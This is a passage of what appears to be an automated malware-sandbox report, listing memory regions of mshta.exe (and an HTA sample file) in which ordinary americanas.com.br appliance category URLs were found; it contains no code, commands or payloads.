00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/lava-loucas?chave=pfm_hm_tt_1_0_lava-loucas
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/maquina-de-lavar?chave=pfm_hm_tt_1_0_maquin
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/micro-ondas?chave=pfm_hm_tt_1_0_micro-ondas
Source: mshta.exe, mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/pecas-para-eletrodomesticos
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486575456.0000000009DAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486650176.0000000009DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=dk_hm_at_edom
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_hm_tt_1_0_eletrodom
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577607629.000000000AADD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494770867.000000000AADA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos?chave=pfm_home_edom_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509110042.00000000095FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512897588.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511109691.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566725542.0000000009602000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/aspirador-de-po?chave=pfm_hm_tt_1_0_aspirado
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567402670.000000000C140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580125535.000000000C141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/batedeira?chave=pfm_hm_tt_1_0_batedeira
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542146842.000000000BE13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573530715.0000000009530000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492697957.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578758949.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476847039.000000000BDED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/bebedouro-e-purificador-de-agua/purificador-
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/cafeteira?chave=pfm_hm_tt_1_0_cafeteira
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509110042.00000000095FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512897588.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511109691.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566725542.0000000009602000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/ferro-de-passar?chave=pfm_hm_tt_1_0_ferro-de
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509110042.00000000095FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512897588.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511109691.00000000095FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566725542.0000000009602000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/forno-eletrico?chave=pfm_hm_tt_1_0_forno-ele
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000BFF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletroportateis/fritadeira-eletrica?chave=pfm_hm_tt_1_0_frit
